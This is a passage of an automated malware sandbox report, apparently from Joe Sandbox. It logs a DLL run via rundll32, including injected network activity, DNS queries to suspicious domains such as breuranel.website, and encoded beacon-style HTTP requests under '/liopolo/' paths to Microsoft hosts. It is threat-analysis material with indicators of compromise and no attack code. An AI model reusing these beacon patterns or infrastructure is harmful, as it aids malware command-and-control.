                      Source: Binary string: iphlpapi.pdbRv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbDv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.218.66 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.153.146 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.137.210 187Jump to behavior
                      Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: Joe Sandbox ViewIP Address: 40.97.153.146 40.97.153.146
                      Source: Joe Sandbox ViewIP Address: 13.82.28.61 13.82.28.61
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0BSH_2Btl/9sqK23pzW1xY/kPT6lmvGYLw/Cf2IOR2fhZTyNL/tKZ289_2FYjlbDZolDbOl/xXcWSCD6IlQGRdIS/84EeVY8JQpYoU7N/sMotozvUSzPLgYoFpN/L9urq8t4YJmiCxPtVCV/XUD.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzqTQ2mVu3pq/cfXt8VkJHx4pF/9i2ySYSz/e6Fwjd_2BYZ5QEKc2Ev8w_2/FX9nTU6mpV/BkgebLJcyW_2BOHak/X7QoD77ir05E/ic.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/a7_2B8h2NmEQ_2FO6HINr/eS5x2dWmrnxEuUas/E6VYZyoESNredc4/JUFmKkMiSye_2BBKeH/JexZCfmhU/vSKjW_2B8KOY/RYzBQt1.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/QoeEw7znNY9KuZLPv/PhlDvAFg0Bnn/nVx6DnTynJS/Jqe2AOjRD8vYJs/PuqBLIn3Zd37OXyJlwD7Q/FiLhjKnVW_2ByswX/LXphFosRYtREZOL/Q6wDOp8ES889SSlI1S/AFbHRrWLn/_2F7R_2FVhgDELEonTCy/KSLPzpnW0YF_2FoB4Xy/kHR_2F88KI6KqxU9hJvbKE/it_2FLM35/c.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: fee0e76a-0690-24c5-d39f-a0f3ac107e50Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: VI1PR0102CU003.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: VI1PR0102CA0087.EURPRD01.PROD.EXCHANGELABS.COMX-CalculatedBETarget: VI1PR04MB4495.eurprd04.prod.outlook.comX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: aufg/pAGxSTTn6DzrBB+UA.1.1X-FEServer: VI1PR0102CA0087X-Powered-By: ASP.NETX-FEServer: AS8PR04CA0081Date: Mon, 11 Oct 2021 22:38:46 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 463ae588-6705-a5a4-dc70-c20dde540b89Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: HE1PR0202CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: HE1PR0202CA0016.EURPRD02.PROD.OUTLOOK.COMX-CalculatedBETarget: HE1P194MB0201.EURP194.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: iOU6RgVnpKXccMIN3lQLiQ.1.1X-FEServer: HE1PR0202CA0016X-Powered-By: ASP.NETX-FEServer: AM6P194CA0062Date: Mon, 11 Oct 2021 22:38:53 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: bd6df30b-3506-0654-39aa-09111fc341ceStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAlt-Svc: h3=":443",h3-29=":443"X-CalculatedFETarget: VI1PR07CU008.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: VI1PR07CA0252.EURPRD07.PROD.OUTLOOK.COMX-CalculatedBETarget: VI1PR01MB6621.EURPRD01.PROD.EXCHANGELABS.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: C/NtvQY1VAY5qgkRH8NBzg.1.1X-FEServer: VI1PR07CA0252X-Powered-By: ASP.NETX-FEServer: AM5PR0101CA0012Date: Mon, 11 Oct 2021 22:40:08 GMTConnection: close
                      Source: loaddll32.exe, 00000000.00000003.1005981116.00000000016C2000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.899844356.00000000045A7000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000002.928906655.00000000048CC000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000002.940321648.0000000005220000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.1093713289.0000000001713000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: http://ogp.me/ns#
                      Source: loaddll32.exe, 00000000.00000003.1093713289.0000000001713000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: http://ogp.me/ns/fb#
                      Source: loaddll32.exe, 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931542596.00000000058BC000.00000004.00000040.sdmpString found in binary or memory: https://blogs.msn.com/
                      Source: loaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmpString found in binary or memory: https://breuranel.website/liopolo/q3ygJYAFVGZ_2F/lrVZdSxP5qWZx0IQW_2Fv/fatA_2F92zFSM6Wv/k_2BiVYapNB7
                      Source: loaddll32.exe, 00000000.00000003.1005943661.000000000169F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1093682966.000000000170D000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.931542596.00000000058BC000.00000004.00000040.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991885&rver
                      Source: rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991891&rver
                      Source: loaddll32.exe, 00000000.00000003.1093773062.0000000003BBB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991967&rver
                      Source: rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991974&rver
                      Source: loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093739436.0000000003BBC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=en-us"
                      Source: loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpString found in binary or memory: https://msn.com/
                      Source: loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpString found in binary or memory: https://msn.com/D
                      Source: loaddll32.exe, 00000000.00000003.917168598.0000000001701000.00000004.00000001.sdmpString found in binary or memory: https://msn.com/f
                      Source: loaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmpString found in binary or memory: https://outlook.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abY
                      Source: loaddll32.exe, 00000000.00000003.1005981116.00000000016C2000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/
                      Source: loaddll32.exe, 00000000.00000003.1005981116.00000000016C2000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/2H
                      Source: loaddll32.exe, 00000000.00000002.1184438243.00000000016C2000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/9H
                      Source: loaddll32.exe, 00000000.00000003.1005814049.000000000170B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005878880.0000000001706000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005753123.000000000170C000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/Bo
                      Source: loaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1181707542.0000000001715000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpString found in binary or memory: https://outlook.office365.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNus
                      Source: loaddll32.exe, 00000000.00000003.1093773062.0000000003BBB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/en-us//api/modules/cdnfetch"
                      Source: loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/en-us/homepage/_sc/css/d7cb56b9-3a82770e/direct
                      Source: WerFault.exe, 0000000C.00000002.928906655.00000000048CC000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000002.929018615.0000000004983000.00000004.00000001.sdmpString found in binary or memory: https://watson.tel
                      Source: rundll32.exe, 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmpString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gi
                      Source: loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
                      Source: loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpString found in binary or memory: https://wwtlook.office365.com/
                      Source: loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2f31Pla_2BCXtei%2f1R_2BY6O%2fxV8Y0PePoExsKvdRsArLjMT%2
                      Source: loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2f5hHdOh6aVGIiN%2fxm3v7_2B%2fEkShunhzAo7MsZ9CmkqFWtX%2
                      Source: rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fNtZggqxIX2EF9w_2%2fBavTQ0jHk8z72E0%2fmrA_2BNo5fGf18q
                      Source: rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fQoeEw7znNY9KuZLPv%2fPhlDvAFg0Bnn%2fnVx6DnTynJS%2fJqe
                      Source: loaddll32.exe, 00000000.00000003.1093773062.0000000003BBB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/en-us//api/modules/fetch"
                      Source: loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0
                      Source: loaddll32.exe, 00000000.00000003.1005943661.000000000169F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005753123.000000000170C000.00000004.00000001.sdmpString found in binary or memory: https://www.outlook.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXa
                      Source: loaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.1184778471.0000000001722000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1181707542.0000000001715000.00000004.00000001.sdmpString found in binary or memory: https://www.outlook.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V
                      Source: unknownDNS traffic detected: queries for: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0BSH_2Btl/9sqK23pzW1xY/kPT6lmvGYLw/Cf2IOR2fhZTyNL/tKZ289_2FYjlbDZolDbOl/xXcWSCD6IlQGRdIS/84EeVY8JQpYoU7N/sMotozvUSzPLgYoFpN/L9urq8t4YJmiCxPtVCV/XUD.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzqTQ2mVu3pq/cfXt8VkJHx4pF/9i2ySYSz/e6Fwjd_2BYZ5QEKc2Ev8w_2/FX9nTU6mpV/BkgebLJcyW_2BOHak/X7QoD77ir05E/ic.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
